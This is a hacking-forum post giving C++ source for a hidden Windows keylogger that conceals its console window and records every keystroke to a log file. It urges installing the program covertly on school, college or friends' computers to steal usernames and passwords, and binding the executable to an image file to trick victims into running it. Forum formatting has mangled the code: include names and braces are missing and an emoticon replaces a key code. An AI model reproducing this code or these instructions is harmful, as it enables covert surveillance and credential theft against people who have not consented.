PROUD TO BE PAKISTANI
ωєĻ¢σмє тσ ραквυzz ƒσяυм , нєяє уσυ ¢αη đσωηĻσαđ αηу туρє σƒ тσσĻ , ѕσ jυѕт яєgιѕтєя αηđ gєт υѕєƒυĻ тσσĻѕ.
PROUD TO BE PAKISTANI
ωєĻ¢σмє тσ ραквυzz ƒσяυм , нєяє уσυ ¢αη đσωηĻσαđ αηу туρє σƒ тσσĻ , ѕσ jυѕт яєgιѕтєя αηđ gєт υѕєƒυĻ тσσĻѕ.
PROUD TO BE PAKISTANI
Would you like to react to this message? Create an account in a few clicks or log in to continue.

PROUD TO BE PAKISTANI


 
HomeLatest imagesSearchRegisterLog in
Search
 
 

Display results as :
 
Rechercher Advanced Search
Latest topics
» New Server Bots
How to create a keylogger in C++ EmptyWed Sep 09, 2015 9:29 am by dj_$hani

» PHP ONLINE ID MAKER 100% WORKING
How to create a keylogger in C++ EmptyTue Sep 01, 2015 8:26 am by dj_$hani

» NEW SERVER BOTS
How to create a keylogger in C++ EmptyMon Aug 24, 2015 5:35 am by dj_$hani

» Kpv Server v 12 Updated
How to create a keylogger in C++ EmptyMon Aug 24, 2015 5:01 am by dj_$hani

»  KBZ Room Destroyer Limited Edition
How to create a keylogger in C++ EmptyThu Jun 11, 2015 7:53 am by dj_$hani

»  KeralaBuzz dc symbian
How to create a keylogger in C++ EmptyThu Jun 11, 2015 7:52 am by dj_$hani

»  KBZ ADDLIST DISTURBER V1.0
How to create a keylogger in C++ EmptyThu Jun 11, 2015 7:51 am by dj_$hani

»  KBZ Add Flooder With Remote
How to create a keylogger in C++ EmptyThu Jun 11, 2015 7:49 am by dj_$hani

» ONLINE SERVER BOTS ( SURVEY COMPELETED )
How to create a keylogger in C++ EmptyThu Jun 11, 2015 2:53 am by dj_$hani

How to create a keylogger in C++ Flags_0
September 2024
MonTueWedThuFriSatSun
      1
2345678
9101112131415
16171819202122
23242526272829
30      
CalendarCalendar
How to create a keylogger in C++ Tan81v
Top posters
dj_$hani
How to create a keylogger in C++ EmptyHow to create a keylogger in C++ I_voting_barHow to create a keylogger in C++ Empty 
phanxxx
How to create a keylogger in C++ EmptyHow to create a keylogger in C++ I_voting_barHow to create a keylogger in C++ Empty 
rubel
How to create a keylogger in C++ EmptyHow to create a keylogger in C++ I_voting_barHow to create a keylogger in C++ Empty 
i).t33m
How to create a keylogger in C++ EmptyHow to create a keylogger in C++ I_voting_barHow to create a keylogger in C++ Empty 
kharkwas
How to create a keylogger in C++ EmptyHow to create a keylogger in C++ I_voting_barHow to create a keylogger in C++ Empty 
hook75
How to create a keylogger in C++ EmptyHow to create a keylogger in C++ I_voting_barHow to create a keylogger in C++ Empty 
Statistics
We have 36 registered users
The newest registered user is علوش ماكسيمو

Our users have posted a total of 228 messages in 226 subjects

 

 How to create a keylogger in C++

Go down 
AuthorMessage
dj_$hani
σฬηєя
σฬηєя
dj_$hani


Posts : 213
Pakbuzz Team Points : 46204
Pakbuzz Team Reputation : 0
Join date : 2014-05-10
Age : 30
Location : Pakistan

How to create a keylogger in C++ Empty
PostSubject: How to create a keylogger in C++   How to create a keylogger in C++ EmptyMon May 19, 2014 7:55 pm

Hi friends, the most interesting part of the 
hacking is spying. Today i am going to introduce to the C++ Spyware 
code. It is going to be very fun. You can install this spyware in your 
college/school or in your friend system, and get their username and 
passwords. This is very simple hacking trick when compared to phishing 
web page. 


Disadvantage of Phishing Web page: 

you have to upload phishing web page to web hosting. But only few website won't detect the phishing webpage. 

website url is different. Easy to detect that we are hacking. 


Advantage of Spyware-keylogger: 

Very simple and easy method. 

Victim can't detect that we are hacking. 


How to create Keylogger using Visual C++? 

Requirements: 

Dev C++. 

Knowledge about Visual C++(need, if you are going to develop the code). 


Install dev C++ in your system and open the dev C++ compiler. 

Go to File->New->Source File. 

you can see a blank works space will be there in window. 

now copy the below keylogger code into the blank work space. 


#include 

using namespace std; 

#include 

#include 

int Save (int key_stroke, char *file); 

void Stealth(); 


int main() 



Stealth(); 

char i; 


while (1) 



for(i = 8; i <= 190; i++) 



if (GetAsyncKeyState(i) == -32767) 

Save (i,"LOG.txt"); 





system ("PAUSE"); 

return 0; 




/* *********************************** */ 


int Save (int key_stroke, char *file) 



if ( (key_stroke == 1) || (key_stroke == 2) ) 

return 0; 


FILE *OUTPUT_FILE; 

OUTPUT_FILE = fopen(file, "a+"); 


cout << key_stroke << endl; 


if (key_stroke == Cool 

fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]"); 

else if (key_stroke == 13) 

fprintf(OUTPUT_FILE, "%s", "\n"); 

else if (key_stroke == 32) 

fprintf(OUTPUT_FILE, "%s", " "); 

else if (key_stroke == VK_TAB) 

fprintf(OUTPUT_FILE, "%s", "[TAB]"); 

else if (key_stroke == VK_SHIFT) 

fprintf(OUTPUT_FILE, "%s", "[SHIFT]"); 

else if (key_stroke == VK_CONTROL) 

fprintf(OUTPUT_FILE, "%s", "[CONTROL]"); 

else if (key_stroke == VK_ESCAPE) 

fprintf(OUTPUT_FILE, "%s", "[ESCAPE]"); 

else if (key_stroke == VK_END) 

fprintf(OUTPUT_FILE, "%s", "[END]"); 

else if (key_stroke == VK_HOME) 

fprintf(OUTPUT_FILE, "%s", "[HOME]"); 

else if (key_stroke == VK_LEFT) 

fprintf(OUTPUT_FILE, "%s", "[LEFT]"); 

else if (key_stroke == VK_UP) 

fprintf(OUTPUT_FILE, "%s", "[UP]"); 

else if (key_stroke == VK_RIGHT) 

fprintf(OUTPUT_FILE, "%s", "[RIGHT]"); 

else if (key_stroke == VK_DOWN) 

fprintf(OUTPUT_FILE, "%s", "[DOWN]"); 

else if (key_stroke == 190 || key_stroke == 110) 

fprintf(OUTPUT_FILE, "%s", "."); 

else 

fprintf(OUTPUT_FILE, "%s", &key_stroke); 


fclose (OUTPUT_FILE); 

return 0; 




/* *********************************** */ 


void Stealth() 



HWND Stealth; 

AllocConsole(); 

Stealth = FindWindowA("ConsoleWindowClass", NULL); 

ShowWindow(Stealth,0); 




Compile the Code(Ctrl+F9) 


Now execute the program by selecting Execute->Run(ctrl+F10) 


now your keylogger will run in your system. whatever you type using keyboard. It will be stored in Log.txt file. 

you can see the log.txt file where you save the file. 


bind the exe file with image or any files and send it to your friend. 

(0r) 

if you have physical access to your college/school system,then copy the exe file in that system and run it. -
Back to top Go down
http://pakbuzz-team.nstars.org
 
How to create a keylogger in C++
Back to top 
Page 1 of 1
 Similar topics
-
» How to create and keep your flood ids safe
» Create Awesome Grungy Style Artwork using Custom Brushes

Permissions in this forum:You cannot reply to topics in this forum
PROUD TO BE PAKISTANI :: PROGRAMMING-
Jump to: